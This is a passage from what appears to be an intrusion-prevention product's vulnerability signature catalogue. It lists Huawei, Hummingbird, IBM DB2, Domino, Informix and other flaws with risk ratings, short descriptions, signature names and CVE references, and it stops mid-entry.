Situation:	HTTP_CRL-Huawei-HG866-Authentication-Bypass

Huawei-Router-HG532-Arbitrary-Command-Execution

About this vulnerability:

A vulnerability in Huawei router HG532

Risk:

High

First detected in:

sgpkg-ips-1355-5242

Last changed:

sgpkg-ips-1355-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Huawei router HG532 detected.

Situation:

HTTP_CRL-Huawei-Router-HG532-Arbitrary-Command-Execution

References:

CVE-2017-17215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215

Huawei-SOHO-Router-Information-Disclosure

About this vulnerability:

A Huawei SOHO Router Information Disclosure vulnerability

Risk:

High

First detected in:

sgpkg-ips-781-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Huawei SOHO Router

Type:

Insecure Configuration

Description:

A vulnerability in Huawei SOHO Router which allows remote attackers to access api pages without authentication allowing them to change configurations and gather information.

Situation:

HTTP_CSU-Huawei-SOHO-Router-Information-Disclosure

References:

CVE-2013-6031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6031

Hulu-Online-Video-Service

About this vulnerability:	Hulu Video service
Risk:	Low
First detected in:	sgpkg-ips-211-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Hulu
Type:	Browser
Description:	Hulu is an online video service that streams tv-series, movies and clips via web browser.
Situation:	HTTP_CSH-Hulu-Access

Hummingbird-Inetd-Lpd-Component-Buffer-Overflow

About this vulnerability:

A vulnerability in Hummingbird InetD

Risk:

High

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Hummingbird Connectivity

Type:

Malfunction

Description:

A buffer overflow vulnerability exists in the LPD component of the Hummingbird InetD product. The issue is caused by improper processing of incoming TCP stream. Successful exploitation of this vulnerability can allow for arbitrary code to be executed on the target system with System level privileges. In a simple attack case aimed at creating a denial of service condition, the LPD child process serving the attack connection terminates. The terminated daemon constitutes an active connection to InetD. Since InetD controls the number of concurrent connections to the vulnerable LPD service, the service will become inaccessible after such number of attacks as is configured as the maximum concurrent connections. InetD at that point will stop accepting new LPD connection requests. The administrator must either reload the LPD service in the InetD management tool or restart the InetD process to resume the LPD service. Note that other InetD services are not affected by attacks against the LPD service. In a more sophisticated attack scenario, where a malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the InetD service process, normally System.

Situation:

Printer_CS-Hummingbird-Inetd-Lpd-Component-Buffer-Overflow

References:

CVE-2005-1815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1815

BID-13788
http://www.securityfocus.com/bid/13788

HuntBar

About this vulnerability:	HuntBar browser plugin
Risk:	Low
First detected in:	sgpkg-ips-33-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	HuntBar
Type:	Misconfiguration
Description:	HuntBar is an internet explorer plugin and is considered unwanted software by some organizations. It sends browsing information to TrafficSyndicate and may use considerable amounts of available computing resources.
Situation:	HTTP_CSH-HuntBar-Download HTTP_CS-HuntBar-SiteReview

Husdawg-System-Requirements-Lab-ActiveX-Unsafe-Method

About this vulnerability:

A Husdawg System Requirements Lab ActiveX Unsafe Method vulnerability

Risk:

High

First detected in:

sgpkg-ips-796-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Husdawg System Requirements Lab

Type:

Malfunction

Description:

A vulnerability in Husdawg System Requirements Lab, version 3, which allows remote attackers to force the execution of arbitrary code by specifying a malicious argument to the Init method in a certain ActiveX control.

Situation:

File-Text_Microsoft-Killbit-Disabled-ActiveX-Object

References:

CVE-2008-4385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4385

BID-31752
http://www.securityfocus.com/bid/31752

OSVDB-50122
http://www.osvdb.org/50122

Hylafaxplus-LDAP-Authentication-User-Name-Buffer-Overflow

About this vulnerability:

A vulnerability in HylaFax+ HylaFAX+

Risk:

Moderate

First detected in:

sgpkg-ips-547-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Hylafax

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HylaFAX+. The vulnerability is due to a buffer overflow when an overly long username is used for LDAP authentication. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious username to target server. Successful exploitation could allow arbitrary code execution within security context of the target server.

Situation:

Generic_CS-Hylafaxplus-LDAP-Authentication-User-Name-Buffer-Overflow

References:

CVE-2013-5680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5680

Hyleos-ChemView-Buffer-Overflow

About this vulnerability:

A Hyleos ChemView Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-730-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

Hyleos ChemView

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Hyleos ChemView, version 1.9.5.1, which allows remote attackers to execute arbitrary code via a large number of white space characters in the filename argument to the SaveasMolFile and ReadMolFile methods.

Situation:

File-Text_Hyleos-ChemView-Buffer-Overflow

References:

CVE-2010-0679
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0679

OSVDB-62276
http://www.osvdb.org/62276

IA-Webmail-Server-HTTP-Get-Request-BOF

About this vulnerability:

Buffer overflow in IA WebMail Server

Risk:

High

First detected in:

sgpkg-ips-13-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

True North Software IA WebMail Server

Type:

Buffer Overflow

Description:

IA WebMail Server versions 3.1 and 3.0 are vulnerable to a buffer overflow. A remote attacker can send a long HTTP GET request to overflow a buffer and execute arbitrary code on the system.

References:

CVE-2003-1192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1192

BID-8965
http://www.securityfocus.com/bid/8965

OSVDB-2757
http://www.osvdb.org/2757

IAS-MS-CHAP-V2-Authentication-Bypass

About this vulnerability:

A vulnerability in Internet Authentication Service (IAS)

Risk:

High

First detected in:

sgpkg-ips-1060-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IAS

Type:

Malfunction

Description:

There exists a vulnerability in how the MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) confirms authentication in the Internet Authentication Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold.

Situation:

Generic_UDP-IAS-MS-CHAP-V2-Authentication-Bypass

References:

CVE-2009-3677
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3677

MS09-071
http://technet.microsoft.com/security/bulletin/MS09-071

IBiz-EBanking-Integrator-ActiveX-WriteOFXDataFile-Method-Arbitrary-File-Write

About this vulnerability:

A vulnerability in IBiz EBanking Integrator

Risk:

High

First detected in:

sgpkg-ips-583-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBiz EBanking Integrator

Type:

Input Validation

Description:

There is an arbitraty file write vulnerability in the IBiz EBanking ActiveX control when calling the WriteOFXDataFile method.

Situation:

File-Text_IBiz-EBanking-Integrator-ActiveX-WriteOFXDataFile-Method-Arbitrary-File-Write

References:

CVE-2008-1725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1725

BID-28700
http://www.securityfocus.com/bid/28700

OSVDB-44393
http://www.osvdb.org/44393

IBM-Aspera-Faspex-Remote-Code-Execution-CVE-2022-47986

About this vulnerability:

A vulnerability in IBM Aspera Faspex

Risk:

High

First detected in:

sgpkg-ips-1558-5242

Last changed:

sgpkg-ips-1558-5242

Platform:

Generic

Software:

IBM Aspera Faspex

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in IBM Aspera Faspex.

Situation:

File-Text_IBM-Aspera-Faspex-Remote-Code-Execution-CVE-2022-47986

References:

CVE-2022-47986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47986

IBM-BigFix-Relay-Servers-Information-Disclosure

About this vulnerability:

A vulnerability in IBM BigFix Relay Servers

Risk:

High

First detected in:

sgpkg-ips-1198-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM BigFix

Type:

Insecure Configuration

Description:

A vulnerability in IBM BigFix Relay Servers which allows remote attackers to gather information about the target system due to the lack of user authentication.

Situation:

HTTP_CSU-IBM-BigFix-Relay-Servers-Information-Disclosure

References:

CVE-2019-4061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4061

IBM-Cognos-Buffer-Overflow

About this vulnerability:

An IBM Cognos Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-713-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3

Software:

IBM Cognos Express

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in IBM Cognos Express 5.9, in tm1admsd.exe that allows remote attackers to execute arbitrary code via crafted data.

Situation:

Generic_CS-IBM-Cognos-Buffer-Overflow

References:

CVE-2012-0202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0202

BID-52847
http://www.securityfocus.com/bid/52847

OSVDB-80876
http://www.osvdb.org/80876

IBM-Cognos-Server-Backdoor-Account-Remote-Code-Execution

About this vulnerability:

A vulnerability in IBM Cognos Express

Risk:

High

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

IBM Cognos Express

Type:

Backdoor

Description:

A code execution vulnerability exists in IBM Cognos Express. The vulnerability is due to hard-coded user credentials, with manager-level permissions, installed by default in the user configuration of the bundled Tomcat server. Remote unauthenticated attackers can exploit this vulnerability by using these credentials to connect to the vulnerable server over port 19300/TCP and deploy a malicious web application on a vulnerable system. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. In this case, the injected code will run with the privileges of the Tomcat server process. On Windows systems the Tomcat process runs as SYSTEM.

Situation:

HTTP_CSH-IBM-Cognos-Server-Backdoor-Account-Remote-Code-Execution

References:

CVE-2010-0557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0557

BID-38084
http://www.securityfocus.com/bid/38084

OSVDB-62118
http://www.osvdb.org/62118

IBM-Data-Risk-Manager-Authentication-Bypass

About this vulnerability:

An attempt to exploit a vulnerability in IBM Data Risk Manager detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

IBM Data Risk Manager

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in IBM Data Risk Manager detected.

Situation:

HTTP_CSU-IBM-Data-Risk-Manager-Authentication-Bypass

References:

CVE-2020-4427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4427

IBM-Data-Risk-Manager-Path-Traversal

About this vulnerability:

An attempt to exploit a vulnerability in IBM Data Risk Manager detected

Risk:

High

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1407-5242

Platform:

Generic

Software:

IBM Data Risk Manager

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in IBM Data Risk Manager detected.

Situation:

HTTP_CRL-IBM-Data-Risk-Manager-Path-Traversal

References:

CVE-2020-4430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4430

IBM-Data-Risk-Manager-Unathenticated-RCE

About this vulnerability:

A vulnerability in IBM Data Risk Manager.

Risk:

High

First detected in:

sgpkg-ips-1358-5242

Last changed:

sgpkg-ips-1358-5242

Platform:

Linux

Software:

IBM Data Risk Manager

Type:

Input Validation

Description:

A vulnerability in IBM Data Risk Manager, version 2.0.4 and before, which allows remote attackers to execute arbitrary code by uploading specially crafted files to albatross/upload/patch where commands are accepted and processed without validation.

Situation:

HTTP_CS-IBM-Data-Risk-Manager-Unathenticated-RCE

References:

CVE-2020-4428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4428

IBM-DB2-Database-Server-SQL-REPEAT-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in IBM DB2

Risk:

High

First detected in:

sgpkg-ips-280-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

IBM DB2

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in IBM DB2. A remote authenticated attacker can exploit this vulnerability by invoking the REPEAT function call with a malicious argument to cause a denial of service condition or to execute arbitrary code with the privileges of the affected service.

Situation:

Generic_CS-IBM-DB2-Database-Server-SQL-REPEAT-Buffer-Overflow

References:

CVE-2010-0462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0462

BID-37976
http://www.securityfocus.com/bid/37976

OSVDB-62063
http://www.osvdb.org/62063

IBM-DB2-kuddb2-Remote-Denial-of-Service-Vulnerability

About this vulnerability:

IBM DB2 kuddb2 Remote Denial of Service Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-694-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

IBM DB2

Type:

Malfunction

Description:

A ulnerability in IBM DB2 9.7 FP1 which allows remote attackers to cause a denial of service condition by sending a specific byte sequence.

Situation:

X11_CS-IBM-DB2-kuddb2-Remote-Denial-of-Service-Vulnerability

References:

CVE-2010-0472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0472

BID-38018
http://www.securityfocus.com/bid/38018

IBM-DB2-Universal-Database-Connection-Handshake-Denial-of-Service

About this vulnerability:

An IBM DB2 Universal Database Connection Handshake Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM DB2

Type:

Malfunction

Description:

A vulnerability in IBM DB2 Universal Database which allows remote attackers to create a denial of service condition by omitting the RDBNAM parameter from the first ACCSEC command during the connection establishment process.

Situation:

Generic_CS-IBM-DB2-Universal-Database-Connection-Handshake-Denial-of-Service

References:

CVE-2006-4257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4257

IBM-DB2-Universal-Database-Receivedasmessage-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM DB2

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM DB2

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in IBM DB2 Universal Database.

Situation:

Generic_CS-IBM-DB2-Universal-Database-Receivedasmessage-Buffer-Overflow

References:

BID-46052
http://www.securityfocus.com/bid/46052

IBM-DB2-Universal-Database-XML-Query-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM DB2 Universal Database

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM DB2

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in IBM DB2 Universal Database application.

Situation:

Generic_CS-IBM-DB2-Universal-Database-XML-Query-Buffer-Overflow

References:

CVE-2008-3854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3854

BID-29601
http://www.securityfocus.com/bid/29601

IBM-Director-Agent-DOS

About this vulnerability:	A vulnerability in IBM Director Agent
Risk:	High
First detected in:	sgpkg-ips-410-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	IBM Director Agent
Type:	Buffer Overflow
Description:	There is a vulnerability within IBM Director Agent. This is a tool released by IBM to monitor and control computer systems remotely. It is possible for a remote attacker to craft and send a packet that will cause the remote Agent to terminate leading to a denial of service condition. Upon receipt of a malformed request from an attacker, the director agent service will terminate on the target computer. An administrator will then be unable to connect to the remote agent through the IBM Director interface until the agent is restarted on the target computer.
Situation:	Generic_CS-IBM-Director-Agent-DOS

IBM-Director-CIM-Server-Consumer-Name-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in IBM Systems Director

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

IBM Systems Director

Type:

Input Validation

Description:

A design weakness exists in the CIM Server of IBM Director.

Situation:

HTTP_CSU-IBM-Director-CIM-Server-Consumer-Name-Handling-Denial-Of-Service

References:

CVE-2009-0879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0879

BID-34061
http://www.securityfocus.com/bid/34061

OSVDB-52615
http://www.osvdb.org/52615

IBM-Domino-Gif-Processing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Domino

Risk:

Moderate

First detected in:

sgpkg-ips-668-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Domino

Type:

Buffer Overflow

Description:

An integer truncation vulnerability exists in IBM Lotus Domino Server. The vulnerability exists in the way that nrouter.exe component handles GIF files in emails. By sending a crafted email to a Domino server, a remote unauthenticated can possibly exploit this vulnerability to execute arbitrary code with System privileges on the target server.

Situation:

File-GIF_IBM-Domino-Gif-Processing-Heap-Buffer-Overflow

References:

CVE-2015-0135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0135

IBM-Domino-Image-File-Parsing-CVE-2015-5040-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Domino

Risk:

High

First detected in:

sgpkg-ips-717-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Domino

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in IBM Domino. The vulnerability is due to improper bounds checking when parsing image files. This could potentially lead to an undersized buffer being allocated. A remote, unauthenticated attacker can exploit this vulnerability by sending an email containing a crafted image to the target server. A successful attack will result in the ability to execute arbitrary code with System privileges on the target server.

Situation:

File-Binary_IBM-Domino-Image-File-Parsing-CVE-2015-5040-Buffer-Overflow

References:

CVE-2015-5040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5040

IBM-Domino-IMAP-Mailbox-Name-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Domino

Risk:

Moderate

First detected in:

sgpkg-ips-925-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Domino

Type:

Buffer Overflow

Description:

Improper processing of command arguments with several IMAP commands causes a stack buffer overflow vulnerability in IBM Domino. A successful exploitation allows an attacker to run arbitrary code with system privileges.

Situation:

IMAP_IBM-Domino-IMAP-Mailbox-Name-Stack-Buffer-Overflow

References:

CVE-2017-1274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1274

IBM-Domino-LDAP-Server-Modifyrequest-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Domino

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Domino

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exist in IBM Domino's LDAP Server. The vulnerability is due to insufficient validation of input leading to copying an indefinite amount of data from a crafted ModifyRequest LDAP message to a fixed length stack buffer. A remote, unauthenticated attacker can exploit this vulnerability to cause a buffer overflow. Successful exploitation will result in the execution of arbitrary code with SYSTEM privileges. An unsuccessful attack could result in a denial of service condition of the affected service.

Situation:

LDAP_CS-IBM-Domino-LDAP-Server-Modifyrequest-Stack-Buffer-Overflow

References:

CVE-2015-0117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0117

IBM-Forms-Viewer-Xfdl-Form-Processing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Forms Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-559-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Forms Viewer

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in IBM Forms Viewer. The vulnerability is due to an error when processing XFDL forms and can be exploited to cause a stack-based buffer overflow. A remote unauthenticated attacker can exploit the vulnerability by enticing a user to open a specifically crafted form. Successful exploitation of the vulnerability would result in the execution of arbitrary code within the security context of the currently logged on user.

Situation:

File-TextId_IBM-Forms-Viewer-Xfdl-Form-Processing-Stack-Buffer-Overflow

References:

CVE-2013-5447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5447

OSVDB-100732
http://www.osvdb.org/100732

IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in IBM Informix Client SDK
Risk:	High
First detected in:	sgpkg-ips-259-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	IBM Informix Client SDK; IBM Informix Connect
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in IBM Informix Client SDK. The vulnerability is due to insufficient input validation while parsing ".nfx" files, and may lead to code execution in the context of the current user.
Situation:	HTTP_SS-IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow File-TextId_IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow

IBM-Informix-Dynamic-Server-Bts_tracefile-Directory-Traversal

About this vulnerability:	A vulnerability in IBM Informix Dynamic Server
Risk:	Moderate
First detected in:	sgpkg-ips-1270-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	IBM Informix Dynamic Server
Type:	Directory Traversal
Description:	There exists a directory traversal vulnerability in IBM Informix Dynamic Server. Successful exploitation could lead in arbitrary code execution.
Situation:	Generic_CS-IBM-Informix-Dynamic-Server-Bts_tracefile-Directory-Traversal

IBM-Informix-Dynamic-Server-Command-Argument-Processing-Stack-Overflow

About this vulnerability:

A vulnerability in IBM Informix Dynamic Server

Risk:

High

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Informix Dynamic Server

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in IBM Informix Dynamic Server. The vulnerability is due to a boundary error when processing a large number of arguments passed in the Authentication messages. Remote unauthenticated attackers may exploit the vulnerability to cause denial of service or inject and execute arbitrary code on the target system with System privileges. In a sophisticated attack scenario where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, normally System. In an attack case where code injection is not successful, the affected server will terminate and reset all established connections.

Situation:

Generic_CS-IBM-Informix-Dynamic-Server-Command-Argument-Processing-BOF

References:

CVE-2008-0727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0727

BID-28198
http://www.securityfocus.com/bid/28198

IBM-Informix-Dynamic-Server-Dbinfo-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Informix Dynamic Server

Risk:

High

First detected in:

sgpkg-ips-376-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Informix Dynamic Server

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in IBM Informix Dynamic Server Database. The vulnerability is caused by insufficient bounds checking on user-supplied data provided to the DBINFO function as part of an SQL query. Successful exploitation of this vulnerability requires permission to execute SQL queries on a vulnerable server. An attacker could overflow the stack buffer allowing execution of arbitrary code with the privileges of the affected service, whereas an unsuccessful exploitation attempt may result in a denial of service for the database.

Situation:

Generic_CS-IBM-Informix-Dynamic-Server-Dbinfo-Stack-Buffer-Overflow

References:

CVE-2010-4069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4069

BID-44190
http://www.securityfocus.com/bid/44190

OSVDB-68707
http://www.osvdb.org/68707

IBM-Informix-Dynamic-Server-Librpc.dll-Multiple-Buffer-Overflows

About this vulnerability:

A vulnerability in IBM Informix Dynamic Server

Risk:

High

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Informix Dynamic Server

Type:

Buffer Overflow

Description:

Multiple buffer overflow vulnerabilities has been reported in IBM's Informix Dynamic Server. The vulnerabilities are due to insufficient validation of user inputs during authentication by the RPC protocol parsing library, librpc.dll. This library is used by the Portmapper service (portmap.exe) which runs on port TCP/36890. A remote attacker could exploit the vulnerability by sending malicious RPC packets to the target server. Successful exploitation would cause heap and stack based buffer overflows which can lead to arbitrary code execution in the context of the affected service, which is SYSTEM.

Situation:

Generic_CS-IBM-Informix-Dynamic-Server-SunRPC-Buffer-Overflow
Generic_UDP-IBM-Informix-Dynamic-Server-SunRPC-Buffer-Overflow

References:

CVE-2009-2753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2753

BID-38471
http://www.securityfocus.com/bid/38471

IBM-Informix-Dynamic-Server-Long-Username-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in certain versions of the IBM Informix Dynamic Server (IDS)

Risk:

Moderate

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Informix Dynamic Server

Type:

Buffer Overflow

Description:

Certain versions of the IBM Informix Dynamic Server suffer from a vulnerability where a long username in a login packet will cause a buffer overflow. The buffer overflow can be used by remote attackers to execute arbitrary code on a vulnerable host.

Situation:

Generic_CS-IBM-Informix-Dynamic-Server-Long-Username-Buffer-Overflow

References:

CVE-2006-3853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3853

BID-19264
http://www.securityfocus.com/bid/19264

OSVDB-27685
http://www.osvdb.org/27685

IBM-Informix-Dynamic-Server-Long-Username-Vsprintf-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in certain versions of the IBM Informix Dynamic Server (IDS)

Risk:

Moderate

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Informix Dynamic Server

Type:

Buffer Overflow

Description:

Certain versions of the IBM Informix Dynamic Server suffer from a vulnerability where a long username in a login packet will cause a buffer overflow. This issue is a vulnerability in the fix for CVE-2006-3853, resulting from the incorrect use of buffers while printing an error message. The buffer overflow can be used by remote attackers to execute arbitrary code on a vulnerable host.

Situation:

Generic_CS-IBM-Informix-Dynamic-Server-Long-Username-Vsprintf-Buffer-Overflow

References:

CVE-2006-3854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3854

IBM-Informix-Dynamic-Server-Oninit.exe-Explain-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Informix Dynamic Server

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Informix Dynamic Server

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in IBM Informix Dynamic Server Database.

Situation:

Generic_CS-IBM-Informix-Dynamic-Server-Oninit.exe-Explain-Stack-Buffer-Overflow

References:

CVE-2010-4053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4053

BID-44192
http://www.securityfocus.com/bid/44192

OSVDB-68705
http://www.osvdb.org/68705

IBM-Informix-Dynamic-Server-Set-Environment-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Informix Dynamic Server

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Informix Dynamic Server

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in IBM Informix Dynamic Server.

Situation:

Generic_CS-IBM-Informix-Dynamic-Server-Set-Environment-Stack-Buffer-Overflow

References:

CVE-2011-1033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1033

BID-46230
http://www.securityfocus.com/bid/46230

IBM-Informix-Dynamic-Server-testconn-Heap-Buffer-Overflow

About this vulnerability:

AN IBM Informix Dynamic Server testconn Heap Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-932-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Informix Dynamic Server

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability in IBM Informix Dynamic Server, and Informix Open Admin Tool, which allows remote attackers to execute remote code, due to an input validation error with requests sent to index.php.

Situation:

HTTP_CRL-IBM-Informix-Dynamic-Server-testconn-Heap-Buffer-Overflow

References:

CVE-2017-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1092

IBM-Informix-OpenAdmin-Tool-Welcomeservice.php-Command-Execution

About this vulnerability:

A vulnerability in IBM Informix Dynamic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1044-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Informix Dynamic Server

Type:

Input Validation

Description:

There has been reported a vulnerability in IBM Informix OpenAdmin Tool. User-supplied input isn't parsed properly on the SOAP interface. This vulnerability can be exploited by sending a crafted HTTP request to the target server.

Situation:

HTTP_CRL-IBM-Informix-OpenAdmin-Tool-Welcomeservice.php-Command-Execution

References:

CVE-2017-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1092

IBM-iNotes-ActiveX-Control-Integer-Overflow

About this vulnerability:

A vulnerability in IBM iNotes

Risk:

Moderate

First detected in:

sgpkg-ips-546-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Lotus iNotes; Lotus Domino

Type:

Integer Overflow

Description:

There is a buffer overflow vulnerability in IBM iNotes. The vulnerability is due to an integer overflow within an ActiveX control. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.

Situation:

File-Text_IBM-iNotes-ActiveX-Control-Integer-Overflow

References:

CVE-2013-3027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3027

OSVDB-95993
http://www.osvdb.org/95993

IBM-Installation-Manager-IIM-URI-Handling-Code-Execution

About this vulnerability:

A vulnerability in IBM Installation Manager

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM Installation Manager; IBM Rational Robot; IBM Rational Team Concert Standard Edition

Type:

Input Validation

Description:

